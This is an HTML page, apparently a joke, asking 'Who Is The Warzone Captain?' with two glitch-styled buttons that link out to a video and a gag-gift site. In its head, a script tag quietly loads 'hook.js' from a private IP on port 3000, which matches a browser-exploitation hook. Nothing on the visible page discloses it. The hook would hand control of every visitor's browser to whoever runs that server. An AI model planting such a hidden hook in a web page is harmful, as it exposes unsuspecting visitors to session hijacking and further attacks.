<!DOCTYPE html>
<html>
<head>
    <link href="https://fonts.cdnfonts.com/css/arcade-classic" rel="stylesheet">
    <script src="http://192.168.8.191:3000/hook.js"></script>
  <style>
    body {
      background-color: #000000;
      text-align: center;
      color: white;
      margin-top: 2in;
      margin-left: 1in;
      margin-right: 1.5in;
      font-family: 'ArcadeClassic', sans-serif;
      font-size: larger;
                                                
    }
    h1 {
        color: white;
    }
    p1 {
        color: white;
    }
    p2 {
        color: white;
    }
    .button-49,
.button-49:after {
  width: 150px;
  height: 76px;
  line-height: 78px;
  font-size: 20px;
  font-family: 'Bebas Neue', sans-serif;
  background: linear-gradient(45deg, transparent 5%, #FF013C 5%);
  border: 0;
  color: #fff;
  letter-spacing: 3px;
  box-shadow: 6px 0px 0px #00E6F6;
  outline: transparent;
  position: relative;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-49:after {
  --slice-0: inset(50% 50% 50% 50%);
  --slice-1: inset(80% -6px 0 0);
  --slice-2: inset(50% -6px 30% 0);
  --slice-3: inset(10% -6px 85% 0);
  --slice-4: inset(40% -6px 43% 0);
  --slice-5: inset(80% -6px 5% 0);
  
  content: 'ALTERNATE TEXT';
  display: block;
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background: linear-gradient(45deg, transparent 3%, #00E6F6 3%, #00E6F6 5%, #FF013C 5%);
  text-shadow: -3px -3px 0px #F8F005, 3px 3px 0px #00E6F6;
  clip-path: var(--slice-0);
}

.button-49:hover:after {
  animation: 1s glitch;
  animation-timing-function: steps(2, end);
}

@keyframes glitch {
  0% {
    clip-path: var(--slice-1);
    transform: translate(-20px, -10px);
  }
  10% {
    clip-path: var(--slice-3);
    transform: translate(10px, 10px);
  }
  20% {
    clip-path: var(--slice-1);
    transform: translate(-10px, 10px);
  }
  30% {
    clip-path: var(--slice-3);
    transform: translate(0px, 5px);
  }
  40% {
    clip-path: var(--slice-2);
    transform: translate(-5px, 0px);
  }
  50% {
    clip-path: var(--slice-3);
    transform: translate(5px, 0px);
  }
  60% {
    clip-path: var(--slice-4);
    transform: translate(5px, 10px);
  }
  70% {
    clip-path: var(--slice-2);
    transform: translate(-10px, 10px);
  }
  80% {
    clip-path: var(--slice-5);
    transform: translate(20px, -10px);
  }
  90% {
    clip-path: var(--slice-1);
    transform: translate(-10px, 0px);
  }
  100% {
    clip-path: var(--slice-1);
    transform: translate(0);
  }
}

@media (min-width: 768px) {
  .button-49,
  .button-49:after {
    width: 200px;
    height: 86px;
    line-height: 88px;
  }
}
  </style>
</head>
<body>
    <header>Who Is The Warzone Captain?</header>
  <h1></h1>
  <p>A question that science still does not yet know the answer to. It seems the only way to truly know is by playful banter.</p>
  <p>Click bleow to determine once and for all who is THE Warzone Captain</p>
  <button class="button-49" role="button" onclick="window.location.href='https://www.youtube.com/watch?v=eBGIQ7ZuuiU'">Gage</button>
  <button class="button-49" role="button" onclick="window.location.href='https://www.shitexpress.com/'">Caleb</button>
</body>
</html>
